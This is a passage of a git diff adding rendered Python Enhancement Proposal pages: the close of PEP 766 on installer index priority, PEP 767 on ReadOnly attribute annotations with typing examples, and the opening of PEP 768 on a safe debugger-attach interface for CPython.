In index priority, the resolver finds candidates for each index, one at a time. +The resolver proceeds to subsequent indexes only if the current package request +has no viable candidates. Index priority does not combine indexes into one +global, flat namespace. Because indexes are searched in order, the package from +an earlier index will be preferred over a package from a later index, +regardless of whether the later index had a better match with the installer’s +optimization criteria. For a given installer, the optimization criteria and +selection algorithm should be the same for both index priority and version +priority. It is only the treatment of multiple indexes that differs: all +together for version priority, and individually for index priority.

+

The order of specification of indexes determines their priority in the +finding process. As a result, the way that installers load the index +configuration must be predictable and reproducible. This PEP does not prescribe +any particular mechanism, other than to say that installers should provide +a way of ordering their collection of sources. Installers should also +ideally provide optional debugging output that provides insight into +which index is being considered.

+

Each package’s finder should start at the beginning of the list of indexes, so each +package starts over with the index list. In other words, if one package has no +valid candidates on the first index, but finds a hit on the second index, +subsequent packages should still start their search on the first index, rather than +starting on the second.

+

One desirable behavior that the index priority strategy implies is that +there are no “surprise” updates, where a version bump on a +lower-priority index wins out over a curated, approved higher-priority +index. This is related to the security improvement of PEP 708, where +packages can restrict the external indexes that distributions can come +from, but index priority is more configurable by end users. The package installs are +only expected to change when either the higher-priority index or the +index priority configuration change. This stability and predictability +makes it more viable to configure indexes as a more persistent property of an +environment, rather than a one-off argument for one install command.

+
+

Cache keys

+

Because index priority is acknowledging the possibility that different indexes +may have different content for a given package, caching and lockfiles should now +include the index from which distributions were downloaded. Without this +aspect, it is possible that after changing the list of configured indexes, the +cache or lockfile could provide a similarly-named distribution from a +lower-priority index. If every index follows the recommended behavior of +providing identical files across indexes for a given filename, this is not an +issue. However, that recommendation is not readily enforceable, and augmenting +the cache key with origin index would be a wise defensive change.

+
+
+

Ways that a request falls through to a lower priority index

+
    +
  • Package name is not present at all in higher priority index
  • +
  • All distributions from higher priority index filtered out due to +version specifier, compatible Python version, platform tag, yanking or otherwise
  • +
  • A denylist configuration for the installer specifies that a particular package +name should be ignored on a given index
  • +
  • A higher priority index is unreachable (e.g. blocked by firewall +rules, temporarily unavailable due to maintenance, other miscellaneous +and temporary networking issues). This is a less clear-cut detail that +should be controllable by users. On one hand, this behavior would lead +to less predictable, likely unreproducible results by unexpectedly +falling through to lower priority indexes. On the other hand, graceful +fallback may be more valuable to some users, especially if they can +safely assume that all of their indexes are equally trusted. pip’s +behavior today is graceful fallback: you see warnings if an index is +having connection issues, but the installation will proceed with any +other available indexes. Because index priority can convey different trust +levels between indexes, installers that implement index priority should +default to raising errors and aborting on network issues. Installers may +choose to provide a flag to allow fall-through to lower-priority indexes in +case of network error.
  • +
+

Treatment within a given index follows existing behavior, but stops at +the bounds of one index and moves on to the next index only after all +priority preferences within the one index are exhausted. This means that +existing priorities among the unified collection of packages apply to +each index individually before falling through to a lower priority +index.

+

There are tradeoffs to make at every level of the optimization criteria:

+
    +
  • version: index priority will use an older version from a higher-priority index +even if a newer version is available on another index.
  • +
  • wheel vs sdist: Should the installer use an sdist from a higher-priority +index before trying a wheel from a lower-priority index?
  • +
  • more platform-specific wheels before less specific ones: Should the +installer use less specific wheels from higher-priority indexes +before using more specific wheels from lower priority indexes?
  • +
  • flags such as pip’s --prefer-binary: Should the installer use an sdist from a higher +priority index before considering wheels on a lower priority index?
  • +
+

Installers are free to implement these priorities in different ways for +themselves, but they should document their optimization criteria and how they +handle fall-through to lower-priority indexes. For example, an installer could +say that --prefer-binary should not install an sdist unless it had iterated +through all configured indexes and found no installable binary candidates.

+
+
+

Mirroring

+

As described thus far, the index priority scheme breaks the use case of more +than one index url serving the same content. Such mirrors may be used with the +intent of ameliorating network issues or otherwise improving reliability. One +approach that installers could take to preserve mirroring functionality while +adding index priority would be to add a notion of user-definable index groups, +where each index in the group is assumed to be equivalent. This is related to +Poetry’s notion of package sources, except that this would allow +arbitrary numbers of prioritizable groups, and that this would assume members of +a group to be mirrors. Within each group, content could be combined, or each +member could be fetched concurrently. The fastest responding index would then +represent the group.

+
+
+
+
+

Backwards Compatibility

+

This PEP does not prescribe any changes as mandatory for any installer, +so it only introduces compatibility concerns if tools choose to adopt an +index behavior other than the behavior(s) they currently implement.

+

This PEP’s language does not quite align with existing tools, including +pip and uv. Either this PEP’s language can change during review of this PEP, or if +this PEP’s language is preferred, other projects could conform to it. +The only goal of proposing these terms is to create a central, common vocabulary +that makes it easier for users to learn about other installers.

+

As some tools rely on one or the other behavior, there are some possible +issues that may emerge, where tailoring available resources/packages for +a particular behavior may detract from the user experience for people +who rely on the other behavior.

+
    +
  • Different indexes may have different metadata. For example, one cannot assume +that the metadata for package “something” on index “A” has the same dependencies +as “something” on index “B”. This breaks fundamental assumptions of version +priority, but index priority can handle this. When an installer falls through to a +lower-priority index in the search order, it implies refreshing the package metadata +from the new index. This is both an improvement and a complication. It is a +complication in the sense that a cached metadata entry must be keyed by both +package name and index url, instead of just package name. It is a potential +improvement in that different implementation variants of a package can differ in +dependencies as long as their distributions are separated into different indexes.
  • +
  • Users may not get updates as they expect when using index priority, because some higher priority +index has not updated/synchronized with PyPI to get the latest +packages. If the higher priority index has a valid candidate, newer +packages will not be found. This will need to be communicated +verbosely, because it is counter to pip’s well-established behavior.
  • +
  • By adding index priority, an installer will improve the predictability of +which index will be selected, and index hosts may abuse this as a way of having +similarly named files that have different contents. With version priority, +this violates the key package interchangeability assumption, and insanity will ensue. +Index priority would be more workable, but the situation still +has great potential for confusion. It would be helpful to develop tools that +support installers in identifying these confusing issues. These tools could +operate independently of the installer process, as a means of validating the +sanity of a set of indexes. Depending on the time cost of these tools, the +installers could run them as part of their process. Users could, of course, +ignore the recommendations at their own risk.
  • +
+
+
+

Security Implications

+

Index priority creates a mechanism for users to explicitly specify a trust +hierarchy among their indexes. As such, it limits the potential for dependency +confusion attacks. Index priority was rejected by PEP 708 as a solution for +dependency confusion attacks. This PEP requests that the rejection be +reconsidered, with index priority serving a different purpose. This PEP is +primarily motivated by the desire to support implementation variants, which is +the subject of another discussion that hopefully leads to a PEP. +It is not mutually exclusive with PEP 708, nor does it suggest reverting or +withdrawing PEP 708. It is an answer to how we could allow users to choose +which index to use at a more fine grained level than “per install”.

+

For a more thorough discussion of the PEP 708 rejection of index +priority, please see the discuss.python.org thread for this PEP.

+
+
+

How to Teach This

+

At the outset, the goal is not to convert pip or any other tool to +change its default priority behavior. The best way to teach is perhaps +to watch message boards, GitHub issue trackers and chat channels, +keeping an eye out for problems that index priority could help solve. +There are several +long-standing +discussions +that +would be good places to +start advertising the concepts. The topics of the two officially +supported behaviors need documentation, and we, the authors of this +PEP, would develop these as part of the review period of this PEP. +These docs would likely consist of additions across several +indexes, cross-linking the concepts between installers. At a +minimum, we expect to add to the +PyPUG and to pip’s +documentation.

+

It will be important for installers to advertise the active behavior, especially in +error messaging, and that will provide ways to provide resources to +users about these behaviors.

+

uv users are already experiencing index priority. uv documents this +behavior +well, but it is always possible to improve the +discoverability of that +documentation from the command line, where users will actually +encounter the unexpected +behavior.

+
+
+

Reference Implementation

+

The uv project demonstrates index priority with its default behavior. uv +is implemented in Rust, though, so if a reference implementation to a Python-based tool +is necessary, we, the authors of this PEP, will provide one. For pip in +particular, we see the implementation plan as something like:

+
    +
  • For users who don’t use --extra-index-url or --find-links, +there will be no change, and no migration is necessary.
  • +
  • pip users would be able opt in to the index priority behavior with a +new config setting in the CLI and in pip.conf. This proposal does not +recommend any strategy as the default for any installer. It only +recommends documenting the strategies that a tool provides.
  • +
  • Enable extra info-level output for any pip operation where more than +one index is used. In this output, state the current strategy setting, +and a terse summary of implied behavior, as well as a link to docs +that describe the different options
  • +
  • Add debugging output that verbosely identifies the index being used at +each step, including where the file is in the configuration hierarchy, +and where it is being included (via config file, env var, or CLI +flag).
  • +
  • Plumb tracking of which index gets used for which +package/distribution through the entire pip install process. Store +this information so that it is available to tools like pip freeze
  • +
  • Supplement PEP 751 (lockfiles) with capture of index where a +package/distribution came from
  • +
+
+
+

Rejected Ideas

+
    +
  • Tell users to set up a proxy/mirror, such as devpi +or Artifactory that +serves local files if present, and forwards to another server (PyPI) +if no local files match

    This matches the behavior of this proposal very closely, except that +this method requires hosting some server, and may be inaccessible or +not configurable to users in some environments. It is also important +to consider that for an organization that operates its own index +(for overcoming PyPI size restrictions, for example), this does not +solve the need for --extra-index-url or proxy/mirror for end +users. That is, organizations get no improvement from this approach +unless they proxy/mirror PyPI as a whole, and get users to configure +their proxy/mirror as their sole index.

    +
  • +
  • Are build tags and/or local version specifiers enough?

    Build tags and local version specifiers will take precedence over +packages without those tags and/or local version specifiers. In a pool +of packages, builds that have these additions hosted on a server other +than PyPI will take priority over packages on PyPI, which rarely use +build tags, and forbid local version specifiers. This approach is +viable when package providers want to provide their own local +override, such as HPC maintainers who provide optimized builds for +their +users. +It is less viable in some ways, such as build tags not showing up in +pip freeze metadata, and local version specifiers not being +allowed on +PyPI. +There is also significant work entailed in building and maintaining +package collections with local build tag variants.

    +

    https://discuss.python.org/t/dependency-notation-including-the-index-url/5659/21

    +
  • +
  • What about PEP 708? Isn’t that +enough?

    PEP 708 is aimed specifically at addressing dependency confusion +attacks, and doesn’t address the potential for implementation variants +among indexes. It is a way of filtering external URLs and encoding an +allow-list for external indexes in index metadata. It does not change +the lack of priority or preference among channels that currently +exists.

    +
  • +
  • Namespacing

    Namespacing is a means of specifying a package such that the Python +usage of the package does not change, but the package installation +restricts where the package comes from. PEP 752 recently proposed a way to +multiplex a package’s owners in a flat package namespace (e.g. +PyPI) by reserving prefixes as grouping elements. NPM’s concept +of “scopes” has +been raised as another good example of how this might look. This PEP +differs in that it is targeted to multiple index, not a flat package +namespace. The net effect is roughly the same in terms of predictably +choosing a particular package source, except that the namespacing +approach relies more on naming packages with these namespace prefixes, +whereas this PEP would be less granular, pulling in packages on +whatever higher-priority index the user specifies. The namespacing +approach relies on all configured indexes treating a given namespace +similarly, which leaves the usual concern that not all configured +indexes are trusted equally. The namespace idea is not incompatible +with this PEP, but it also does not improve expression of trust of +indexes in the way that this PEP does.

    +
  • +
+
+
+

Open Issues

+

[Any points that are still being decided/discussed.]

+
+
+

Acknowledgements

+

This work was supported financially by NVIDIA through employment of the author. +NVIDIA teammates dramatically improved this PEP with their +input. Astral Software pioneered the behaviors of index priority and thus laid the +foundation of this document. The pip authors deserve great praise for their +consistent direction and patient communication of the version priority behavior, +especially in the face of contentious security concerns.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0766.rst

+

Last modified: 2024-11-21 20:00:24 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0767/index.html b/pep-0767/index.html new file mode 100644 index 00000000000..ee76f32a804 --- /dev/null +++ b/pep-0767/index.html @@ -0,0 +1,777 @@ + + + + + + + + PEP 767 – Annotating Read-Only Attributes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 767 – Annotating Read-Only Attributes

+
+
Author:
+
Eneg <eneg at discuss.python.org>
+
Sponsor:
+
Carl Meyer <carl at oddbird.net>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
18-Nov-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 705 introduced the typing.ReadOnly type qualifier +to allow defining read-only typing.TypedDict items.

+

This PEP proposes using ReadOnly in annotations of class and protocol +attributes, as a single concise way to mark them read-only.

+

Akin to PEP 705, it makes no changes to setting attributes at runtime. Correct +usage of read-only attributes is intended to be enforced only by static type checkers.

+
+
+

Motivation

+

The Python type system lacks a single concise way to mark an attribute read-only. +This feature is present in other statically and gradually typed languages +(such as C# +or TypeScript), +and is useful for removing the ability to reassign or delete an attribute +at a type checker level, as well as defining a broad interface for structural subtyping.

+
+

Classes

+

Today, there are three major ways of achieving read-only attributes, honored by type checkers:

+
    +
  • annotating the attribute with typing.Final:
    class Foo:
    +    number: Final[int]
    +
    +    def __init__(self, number: int) -> None:
    +        self.number = number
    +
    +
    +class Bar:
    +    def __init__(self, number: int) -> None:
    +        self.number: Final = number
    +
    +
    +
      +
    • Supported by dataclasses (and type checkers since typing#1669).
    • +
    • Overriding number is not possible - the specification of Final +imposes that the name cannot be overridden in subclasses.
    • +
    +
  • +
  • read-only proxy via @property:
    class Foo:
    +    _number: int
    +
    +    def __init__(self, number: int) -> None:
    +        self._number = number
    +
    +    @property
    +    def number(self) -> int:
    +        return self._number
    +
    +
    +
      +
    • Overriding number is possible. Type checkers disagree about the specific rules. [1]
    • +
    • Read-only at runtime. [2]
    • +
    • Requires extra boilerplate.
    • +
    • Supported by dataclasses, but does not compose well - the synthesized +__init__ and __repr__ will use _number as the parameter/attribute name.
    • +
    +
  • +
  • using a “freezing” mechanism, such as dataclasses.dataclass() or typing.NamedTuple:
    @dataclass(frozen=True)
    +class Foo:
    +    number: int  # implicitly read-only
    +
    +
    +class Bar(NamedTuple):
    +    number: int  # implicitly read-only
    +
    +
    +
      +
    • Overriding number is possible in the @dataclass case.
    • +
    • Read-only at runtime. [2]
    • +
    • No per-attribute control - these mechanisms apply to the whole class.
    • +
    • Frozen dataclasses incur some runtime overhead.
    • +
    • NamedTuple is still a tuple. Most classes do not need to inherit +indexing, iteration, or concatenation.
    • +
    +
  • +
+
+
+

Protocols

+

A read-only attribute name: T on a Protocol in principle +defines two requirements:

+
    +
  1. hasattr(obj, "name")
  2. +
  3. isinstance(obj.name, T)
  4. +
+

Those requirements are satisfiable at runtime by all of the following:

+
    +
  • an object with an attribute name: T,
  • +
  • a class with a class variable name: ClassVar[T],
  • +
  • an instance of the class above,
  • +
  • an object with a @property def name(self) -> T,
  • +
  • an object with a custom descriptor, such as functools.cached_property().
  • +
+

The current typing spec +allows creation of such protocol members using (abstract) properties:

+
class HasName(Protocol):
+    @property
+    def name(self) -> T: ...
+
+
+

This syntax has several drawbacks:

+
    +
  • It is somewhat verbose.
  • +
  • It is not obvious that the quality conveyed here is the read-only character of a property.
  • +
  • It is not composable with type qualifiers.
  • +
  • Not all type checkers agree [3] that all of the above five +objects are assignable to this structural type.
  • +
+
+
+
+

Rationale

+

These problems can be resolved by an attribute-level type qualifier. +ReadOnly has been chosen for this role, as its name conveys the intent well, +and the newly proposed changes complement its semantics defined in PEP 705.

+

A class with a read-only instance attribute can now be defined as:

+
from typing import ReadOnly
+
+
+class Member:
+    def __init__(self, id: int) -> None:
+        self.id: ReadOnly[int] = id
+
+
+

…and the protocol described in Protocols is now just:

+
from typing import Protocol, ReadOnly
+
+
+class HasName(Protocol):
+    name: ReadOnly[str]
+
+
+def greet(obj: HasName, /) -> str:
+    return f"Hello, {obj.name}!"
+
+
+
    +
  • A subclass of Member can redefine .id as a writable attribute or a +descriptor. It can also narrow the type.
  • +
  • The HasName protocol has a more succinct definition, and is agnostic +to the writability of the attribute.
  • +
  • The greet function can now accept a wide variety of compatible objects, +while being explicit about no modifications being done to the input.
  • +
+
+
+

Specification

+

The typing.ReadOnly type qualifier +becomes a valid annotation for attributes of classes and protocols. +It can be used at class-level or within __init__ to mark individual attributes read-only:

+
class Book:
+    id: ReadOnly[int]
+
+    def __init__(self, id: int, name: str) -> None:
+        self.id = id
+        self.name: ReadOnly[str] = name
+
+
+

Type checkers should error on any attempt to reassign or delete an attribute +annotated with ReadOnly. +Type checkers should also error on any attempt to delete an attribute annotated as Final. +(This is not currently specified.)

+

Use of ReadOnly in annotations at other sites where it currently has no meaning +(such as local/global variables or function parameters) is considered out of scope +for this PEP.

+

Akin to Final [4], ReadOnly does not influence how +type checkers perceive the mutability of the assigned object. Immutable ABCs +and containers may be used in combination with ReadOnly +to forbid mutation of such values at a type checker level:

+
from collections import abc
+from dataclasses import dataclass
+from typing import Protocol, ReadOnly
+
+
+@dataclass
+class Game:
+    name: str
+
+
+class HasGames[T: abc.Collection[Game]](Protocol):
+    games: ReadOnly[T]
+
+
+def add_games(shelf: HasGames[list[Game]]) -> None:
+    shelf.games.append(Game("Half-Life"))  # ok: list is mutable
+    shelf.games[-1].name = "Black Mesa"    # ok: "name" is not read-only
+    shelf.games = []                       # error: "games" is read-only
+    del shelf.games                        # error: "games" is read-only and cannot be deleted
+
+
+def read_games(shelf: HasGames[abc.Sequence[Game]]) -> None:
+    shelf.games.append(...)             # error: "Sequence" has no attribute "append"
+    shelf.games[0].name = "Blue Shift"  # ok: "name" is not read-only
+    shelf.games = []                    # error: "games" is read-only
+
+
+

All instance attributes of frozen dataclasses and NamedTuple should be +implied to be read-only. Type checkers may inform that annotating such attributes +with ReadOnly is redundant, but it should not be seen as an error:

+
from dataclasses import dataclass
+from typing import NewType, ReadOnly
+
+
+@dataclass(frozen=True)
+class Point:
+    x: int            # implicit read-only
+    y: ReadOnly[int]  # ok, redundant
+
+
+uint = NewType("uint", int)
+
+
+@dataclass(frozen=True)
+class UnsignedPoint(Point):
+    x: ReadOnly[uint]  # ok, redundant; narrower type
+    y: Final[uint]     # not redundant, Final imposes extra restrictions; narrower type
+
+
+
+

Initialization

+

Assignment to a read-only attribute can only occur in the class declaring the attribute. +There is no restriction to how many times the attribute can be assigned to. +The assignment must be allowed in the following contexts:

+
    +
  • In __init__, on the instance received as the first parameter (likely, self).
  • +
  • In __new__, on instances of the declaring class created via a call +to a super-class’ __new__ method.
  • +
  • At declaration in the body of the class.
  • +
+

Additionally, a type checker may choose to allow the assignment:

+
    +
  • In __new__, on instances of the declaring class, without regard +to the origin of the instance. +(This choice trades soundness, as the instance may already be initialized, +for the simplicity of implementation.)
  • +
  • In @classmethods, on instances of the declaring class created via +a call to the class’ or super-class’ __new__ method.
  • +
+

Note that a child class cannot assign to any read-only attributes of a parent class +in any of the aforementioned contexts, unless the attribute is redeclared.

+
from collections import abc
+from typing import ReadOnly
+
+
+class Band:
+    name: str
+    songs: ReadOnly[list[str]]
+
+    def __init__(self, name: str, songs: abc.Iterable[str] | None = None) -> None:
+        self.name = name
+        self.songs = []
+
+        if songs is not None:
+            self.songs = list(songs)  # multiple assignments are fine
+
+    def clear(self) -> None:
+        # error: assignment to read-only "songs" outside initialization
+        self.songs = []
+
+
+band = Band(name="Bôa", songs=["Duvet"])
+band.name = "Python"           # ok: "name" is not read-only
+band.songs = []                # error: "songs" is read-only
+band.songs.append("Twilight")  # ok: list is mutable
+
+
+class SubBand(Band):
+    def __init__(self) -> None:
+        self.songs = []  # error: cannot assign to a read-only attribute of a base class
+
+
+
# a simplified immutable Fraction class
+class Fraction:
+    numerator: ReadOnly[int]
+    denominator: ReadOnly[int]
+
+    def __new__(
+        cls,
+        numerator: str | int | float | Decimal | Rational = 0,
+        denominator: int | Rational | None = None
+    ) -> Self:
+        self = super().__new__(cls)
+
+        if denominator is None:
+            if type(numerator) is int:
+                self.numerator = numerator
+                self.denominator = 1
+                return self
+
+            elif isinstance(numerator, Rational): ...
+
+        else: ...
+
+    @classmethod
+    def from_float(cls, f: float, /) -> Self:
+        self = super().__new__(cls)
+        self.numerator, self.denominator = f.as_integer_ratio()
+        return self
+
+
+

When a class-level declaration has an initializing value, it can serve as a flyweight +default for instances:

+
class Patient:
+    number: ReadOnly[int] = 0
+
+    def __init__(self, number: int | None = None) -> None:
+        if number is not None:
+            self.number = number
+
+
+
+

Note

+

This feature conflicts with __slots__. An attribute with +a class-level value cannot be included in slots, effectively making it a class variable.

+
+

Type checkers may choose to warn on read-only attributes which could be left uninitialized +after an instance is created (except in stubs, +protocols or ABCs):

+
class Patient:
+    id: ReadOnly[int]    # error: "id" is not initialized on all code paths
+    name: ReadOnly[str]  # error: "name" is never initialized
+
+    def __init__(self) -> None:
+        if random.random() > 0.5:
+            self.id = 123
+
+
+class HasName(Protocol):
+    name: ReadOnly[str]  # ok
+
+
+
+
+

Subtyping

+

Read-only attributes are covariant. This has a few subtyping implications. +Borrowing from PEP 705:

+
    +
  • Read-only attributes can be redeclared as writable attributes, descriptors +or class variables:
    @dataclass
    +class HasTitle:
    +    title: ReadOnly[str]
    +
    +
    +@dataclass
    +class Game(HasTitle):
    +    title: str
    +    year: int
    +
    +
    +game = Game(title="DOOM", year=1993)
    +game.year = 1994
    +game.title = "DOOM II"  # ok: attribute is not read-only
    +
    +
    +class TitleProxy(HasTitle):
    +    @functools.cached_property
    +    def title(self) -> str: ...
    +
    +
    +class SharedTitle(HasTitle):
    +    title: ClassVar[str] = "Still Grey"
    +
    +
    +
  • +
  • If a read-only attribute is not redeclared, it remains read-only:
    class Game(HasTitle):
    +    year: int
    +
    +    def __init__(self, title: str, year: int) -> None:
    +        super().__init__(title)
    +        self.title = title  # error: cannot assign to a read-only attribute of base class
    +        self.year = year
    +
    +
    +game = Game(title="Robot Wants Kitty", year=2010)
    +game.title = "Robot Wants Puppy"  # error: "title" is read-only
    +
    +
    +
  • +
  • Subtypes can narrow the type of read-only attributes:
    class GameCollection(Protocol):
    +    games: ReadOnly[abc.Collection[Game]]
    +
    +
    +@dataclass
    +class GameSeries(GameCollection):
    +    name: str
    +    games: ReadOnly[list[Game]]  # ok: list[Game] is assignable to Collection[Game]
    +
    +
    +
  • +
  • Nominal subclasses of protocols and ABCs should redeclare read-only attributes +in order to implement them, unless the base class initializes them in some way:
    class MyBase(abc.ABC):
    +    foo: ReadOnly[int]
    +    bar: ReadOnly[str] = "abc"
    +    baz: ReadOnly[float]
    +
    +    def __init__(self, baz: float) -> None:
    +        self.baz = baz
    +
    +    @abstractmethod
    +    def pprint(self) -> None: ...
    +
    +
    +@final
    +class MySubclass(MyBase):
    +    # error: MySubclass does not override "foo"
    +
    +    def pprint(self) -> None:
    +        print(self.foo, self.bar, self.baz)
    +
    +
    +
  • +
  • In a protocol attribute declaration, name: ReadOnly[T] indicates that a structural +subtype must support .name access, and the returned value is assignable to T:
    class HasName(Protocol):
    +    name: ReadOnly[str]
    +
    +
    +class NamedAttr:
    +    name: str
    +
    +class NamedProp:
    +    @property
    +    def name(self) -> str: ...
    +
    +class NamedClassVar:
    +    name: ClassVar[str]
    +
    +class NamedDescriptor:
    +    @cached_property
    +    def name(self) -> str: ...
    +
    +# all of the following are ok
    +has_name: HasName
    +has_name = NamedAttr()
    +has_name = NamedProp()
    +has_name = NamedClassVar
    +has_name = NamedClassVar()
    +has_name = NamedDescriptor()
    +
    +
    +
  • +
+
+
+

Interaction with Other Type Qualifiers

+

ReadOnly can be used with ClassVar and Annotated in any nesting order:

+
class Foo:
+    foo: ClassVar[ReadOnly[str]] = "foo"
+    bar: Annotated[ReadOnly[int], Gt(0)]
+
+
+
class Foo:
+    foo: ReadOnly[ClassVar[str]] = "foo"
+    bar: ReadOnly[Annotated[int, Gt(0)]]
+
+
+

This is consistent with the interaction of ReadOnly and typing.TypedDict +defined in PEP 705.

+

An attribute annotated as both ReadOnly and ClassVar can only be assigned to +at declaration in the class body.

+

An attribute cannot be annotated as both ReadOnly and Final, as the two +qualifiers differ in semantics, and Final is generally more restrictive. +Final remains allowed as an annotation of attributes that are only implied +to be read-only. It can be also used to redeclare a ReadOnly attribute of a base class.

+
+
+
+

Backwards Compatibility

+

This PEP introduces new contexts where ReadOnly is valid. Programs inspecting +those places will have to change to support it. This is expected to mainly affect type checkers.

+

However, caution is advised while using the backported typing_extensions.ReadOnly +in older versions of Python. Mechanisms inspecting annotations may behave incorrectly +when encountering ReadOnly; in particular, the @dataclass decorator +which looks for +ClassVar may mistakenly treat ReadOnly[ClassVar[...]] as an instance attribute.

+

To avoid issues with introspection, use ClassVar[ReadOnly[...]] instead of ReadOnly[ClassVar[...]].

+
+
+

Security Implications

+

There are no known security consequences arising from this PEP.

+
+
+

How to Teach This

+

Suggested changes to the typing module documentation, +following the footsteps of PEP 705:

+
    +
  • Add this PEP to the others listed.
  • +
  • Link typing.ReadOnly to this PEP.
  • +
  • Update the description of typing.ReadOnly:
    +
    A special typing construct to mark an attribute of a class or an item of +a TypedDict as read-only.
    +
  • +
  • Add a standalone entry for ReadOnly under the +type qualifiers section:
    +
    The ReadOnly type qualifier in class attribute annotations indicates +that the attribute of the class may be read, but not reassigned or deleted. +For usage in TypedDict, see ReadOnly.
    +
  • +
+
+
+

Rejected Ideas

+
+

Clarifying Interaction of @property and Protocols

+

The Protocols section mentions an inconsistency between type checkers in +the interpretation of properties in protocols. The problem could be fixed +by amending the typing specification, clarifying what implements the read-only +quality of such properties.

+

This PEP makes ReadOnly a better alternative for defining read-only attributes +in protocols, superseding the use of properties for this purpose.

+
+
+

Assignment Only in __init__ and Class Body

+

An earlier version of this PEP proposed that read-only attributes could only be +assigned to in __init__ and the class’ body. A later discussion revealed that +this restriction would severely limit the usability of ReadOnly within +immutable classes, which typically do not define __init__.

+

fractions.Fraction is one example of an immutable class, where the +initialization of its attributes happens within __new__ and classmethods. +However, unlike in __init__, the assignment in __new__ and classmethods +is potentially unsound, as the instance they work on can be sourced from +an arbitrary place, including an already finalized instance.

+

We find it imperative that this type checking feature is useful to the foremost +use site of read-only attributes - immutable classes. Thus, the PEP has changed +since to allow assignment in __new__ and classmethods under a set of rules +described in the Initialization section.

+
+
+
+

Open Issues

+
+

Extending Initialization

+

Mechanisms such as dataclasses.__post_init__() or attrs’ initialization hooks +augment object creation by providing a set of special hooks which are called +during initialization.

+

The current initialization rules defined in this PEP disallow assignment to +read-only attributes in such methods. It is unclear whether the rules could be +satisfyingly shaped in a way that is inclusive of those 3rd party hooks, while +upkeeping the invariants associated with the read-only-ness of those attributes.

+

The Python type system has a long and detailed specification +regarding the behavior of __new__ and __init__. It is rather unfeasible +to expect the same level of detail from 3rd party hooks.

+

A potential solution would involve type checkers providing configuration in this +regard, requiring end users to manually specify a set of methods they wish +to allow initialization in. This however could easily result in users mistakenly +or purposefully breaking the aforementioned invariants. It is also a fairly +big ask for a relatively niche feature.

+
+
+

ReadOnly[ClassVar[...]] and __init_subclass__

+

Should read-only class variables be assignable to within the declaring class’ +__init_subclass__?

+
class URI:
+    protocol: ReadOnly[ClassVar[str]] = ""
+
+    def __init_subclass__(cls, protocol: str = "") -> None:
+        cls.foo = protocol
+
+class File(URI, protocol="file"): ...
+
+
+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0767.rst

+

Last modified: 2024-12-05 19:37:44 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0768/index.html b/pep-0768/index.html new file mode 100644 index 00000000000..32035ceb4c2 --- /dev/null +++ b/pep-0768/index.html @@ -0,0 +1,575 @@ + + + + + + + + PEP 768 – Safe external debugger interface for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 768 – Safe external debugger interface for CPython

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>, Matt Wozniski <godlygeek at gmail.com>, Ivona Stojanovic <stojanovic.i at hotmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
25-Nov-2024
+
Python-Version:
+
3.14
+
Post-History:
+
11-Dec-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a zero-overhead debugging interface to CPython that +allows debuggers and profilers to safely attach to running Python processes. The +interface provides safe execution points for attaching debugger code without +modifying the interpreter’s normal execution path or adding runtime overhead.

+

A key application of this interface will be enabling pdb to attach to live +processes by process ID, similar to gdb -p, allowing developers to inspect and +debug Python applications interactively in real-time without stopping or +restarting them.

+
+
+

Motivation

+

Debugging Python processes in production and live environments presents unique +challenges. Developers often need to analyze application behavior without +stopping or restarting services, which is especially crucial for +high-availability systems. Common scenarios include diagnosing deadlocks, +inspecting memory usage, or investigating unexpected behavior in real-time.

+

Very few Python tools can attach to running processes, primarily because doing +so requires deep expertise in both operating system debugging interfaces and +CPython internals. While C/C++ debuggers like GDB and LLDB can attach to +processes using well-understood techniques, Python tools must implement all of +these low-level mechanisms plus handle additional complexity. For example, when +GDB needs to execute code in a target process, it:

+
    +
  1. Uses ptrace to allocate a small chunk of executable memory (easier said than done)
  2. +
  3. Writes a small sequence of machine code - typically a function prologue, the +desired instructions, and code to restore registers
  4. +
  5. Saves all the target thread’s registers
  6. +
  7. Changes the instruction pointer to the injected code
  8. +
  9. Lets the process run until it hits a breakpoint at the end of the injected code
  10. +
  11. Restores the original registers and continues execution
  12. +
+

Python tools face this same challenge of code injection, but with an additional +layer of complexity. Not only do they need to implement the above mechanism, +they must also understand and safely interact with CPython’s runtime state, +including the interpreter loop, garbage collector, thread state, and reference +counting system. This combination of low-level system manipulation and +deep domain specific interpreter knowledge makes implementing Python debugging tools +exceptionally difficult.

+

The few tools (see for example DebugPy +and Memray) +that do attempt this resort to suboptimal and unsafe methods, +using system debuggers like GDB and LLDB to forcefully inject code. This +approach is fundamentally unsafe because the injected code can execute at any +point during the interpreter’s execution cycle - even during critical operations +like memory allocation, garbage collection, or thread state management. When +this happens, the results are catastrophic: attempting to allocate memory while +already inside malloc() causes crashes, modifying objects during garbage +collection corrupts the interpreter’s state, and touching thread state at the +wrong time leads to deadlocks.

+

Various tools attempt to minimize these risks through complex workarounds, such +as spawning separate threads for injected code or carefully timing their +operations or trying to select some good points to stop the process. However, +these mitigations cannot fully solve the underlying problem: without cooperation +from the interpreter, there’s no way to know if it’s safe to execute code at any +given moment. Even carefully implemented tools can crash the interpreter because +they’re fundamentally working against it rather than with it.

+
+
+

Rationale

+

